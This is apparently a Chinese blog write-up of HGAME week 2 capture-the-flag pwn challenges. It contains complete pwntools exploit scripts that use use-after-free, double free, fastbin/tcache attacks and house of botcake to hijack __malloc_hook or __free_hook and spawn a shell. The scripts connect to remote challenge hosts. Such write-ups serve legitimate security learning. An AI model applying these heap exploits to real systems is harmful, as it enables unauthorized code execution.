Orrr

HGAME week2 复现

发布于 2023-05-10 | 标签: double free tcachebin attack fastbin attack uaf | 6分钟 | 1010字数 | 浏览量::

PWN:

fast_note:

uaf+fastbin attack,此题需要realloc调偏移才能打通one_gadget
exp:

from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])

io=process("./vuln")
# io=remote("node1.anna.nssctf.cn",28391)
elf=ELF("./vuln")
libc=ELF("./libc-2.23.so")

def add(n,s,cc):
    io.sendlineafter(b">",b"1")
    io.sendlineafter(b"Index: ",str(n))
    io.sendlineafter(b"Size: ",str(s))
    io.sendafter(b"Content: ",cc)
    
def delete(n):
    io.sendlineafter(b">",b"2")
    io.sendlineafter(b"Index: ",str(n))
    
def show(n):
    io.sendlineafter(b">",b"3")
    io.sendlineafter(b"Index: ",str(n))
    
add(0,0x60,b"qqq") #0
add(1,0x60,b"www") #1
add(2,0x80,b"eee") #2
add(3,0x10,b"rrr") #3

delete(2)
add(4,0x80,b"A"*7+b"b") #4
show(4)
#0,1,4,3
io.recvuntil(b"b")
libc_addr=u64(io.recv(6).ljust(8,b"\x00"))-0x58-0x3C4B20
print("libc_addr: "+hex(libc_addr))
malloc_hook=libc_addr+libc.sym[b"__malloc_hook"]
realloc=libc_addr+libc.sym[b"__libc_realloc"]
one_gadget=[0x45226,0x4527a,0xf03a4,0xf1247]
shell=libc_addr+one_gadget[3]

# gdb.attach(io)
# pause()

delete(0)
delete(1)
delete(0) #0->1->0

add(5,0x60,p64(malloc_hook-0x23))
add(6,0x60,b"aaa")
add(7,0x60,b"qqq")
add(8,0x60,cyclic(0xb)+p64(shell)+p64(realloc+0x6))

io.sendlineafter(b">",b"1")
io.sendlineafter(b"Index: ",b"9")
io.sendlineafter(b"Size: ",str(0x60))

io.interactive()

# 0x45226 execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   rax == NULL

# 0x4527a execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   [rsp+0x30] == NULL

# 0xf03a4 execve("/bin/sh", rsp+0x50, environ)
# constraints:
#   [rsp+0x50] == NULL

# 0xf1247 execve("/bin/sh", rsp+0x70, environ)
# constraints:
#   [rsp+0x70] == NULL

editable_note:

tcachebin,uaf+free_hook
exp:

#one_gadget条件限制太多了,打free_hook
from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])

io=remote("node1.anna.nssctf.cn",28799)
# io=process("./vuln")
elf=ELF("./vuln")
libc=ELF("./libc-2.31.so")

def add(n,s):
    io.sendlineafter(b">",b"1")
    io.sendlineafter(b"Index: ",str(n))
    io.sendlineafter(b"Size: ",str(s))

def delete(n):
    io.sendlineafter(b">",b"2")
    io.sendlineafter(b"Index: ",str(n))

def edit(n,cc):
    io.sendlineafter(b">",b"3")
    io.sendlineafter(b"Index: ",str(n))
    io.sendafter(b"Content: ",cc)
    
def show(n):
    io.sendlineafter(b">",b"4")
    io.sendlineafter(b"Index: ",str(n))
    
# gdb.attach(io)    
# pause()
    
for i in range(8):
    add(i,0x80)  
#8块,前7块free填满tcachebin,最后一块free进入unsortedbin
add(8,0x10)
#防止unlink与top_chunk合并
for i in range(8):
    delete(i)
    
show(7) #uaf
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-0x60-0x1ECB80
print("leak_addr: "+hex(leak_addr))

free_hook=leak_addr+libc.sym[b"__free_hook"]
sys_addr=leak_addr+libc.sym[b"system"]

edit(6,p64(free_hook))
add(9,0x80)
add(10,0x80)
edit(10,p64(sys_addr))

add(11,0x20)
edit(11,b"/bin/sh")
delete(11)

io.interactive()

new_fast_note:

此题存在uaf,没有edit函数,可以利用house of botcake创造chunk overlap来实现任意地址分配,劫持free_hook

house of botcake:
绕过 tcache->key 的检查:

申请 7 个大小相同,大小大于 0x80 的 chunk,再申请三个,分别为 chunk A 和 chunkB 和 chunk C
释放前 7 个和 chunk A,前面 7 个都会进入到 tcachebin 里面,chunk A 进入到 unsortedbin
释放 chunk B,则 chunk B 会和 chunk A 合并
从 tcachebin 分配走一个
再次释放 chunk B,此时 B 同时存在与 unsortedbin 和 tcachebin

exp:

from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])

io=remote(b"node3.anna.nssctf.cn",28740)
# io=process("./vuln")
libc=ELF("./libc-2.31.so")

def add(n,s,cc):
    io.sendlineafter(b">",b"1")
    io.sendlineafter(b"Index: ",str(n))
    io.sendlineafter(b"Size: ",str(s))
    io.sendafter(b"Content: ",cc)

def delete(n):
    io.sendlineafter(b">",b"2")
    io.sendlineafter(b"Index: ",str(n))

def show(n):
    io.sendlineafter(b">",b"3")
    io.sendlineafter(b"Index: ",str(n))
        
# gdb.attach(io)
# pause()

for i in range(8):
    add(i,0x90,b"/bin/sh")

add(8,0x90,b"/bin/sh")
add(9,0x90,b"/bin/sh")
add(10,0x10,b"/bin/sh")

for i in range(8):
    delete(i)
    
show(7)
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-0x60-0x1ECB80
print("leak_addr: "+hex(leak_addr))

sys_addr=leak_addr+libc.sym[b"system"]
free_hook=leak_addr+libc.sym[b"__free_hook"]

delete(8)

add(11,0x90,b"/bin/sh")

delete(8)

add(12,0xc0,cyclic(0xa0)+p64(free_hook))
add(13,0x90,b"qqq")
add(14,0x90,p64(sys_addr))

delete(11)

io.interactive()
# double free # tcachebin attack # fastbin attack # uaf # 堆
House of force 上一篇
TAMU wp 下一篇
已运行:
浏览数: | 访客数:
💤💤💤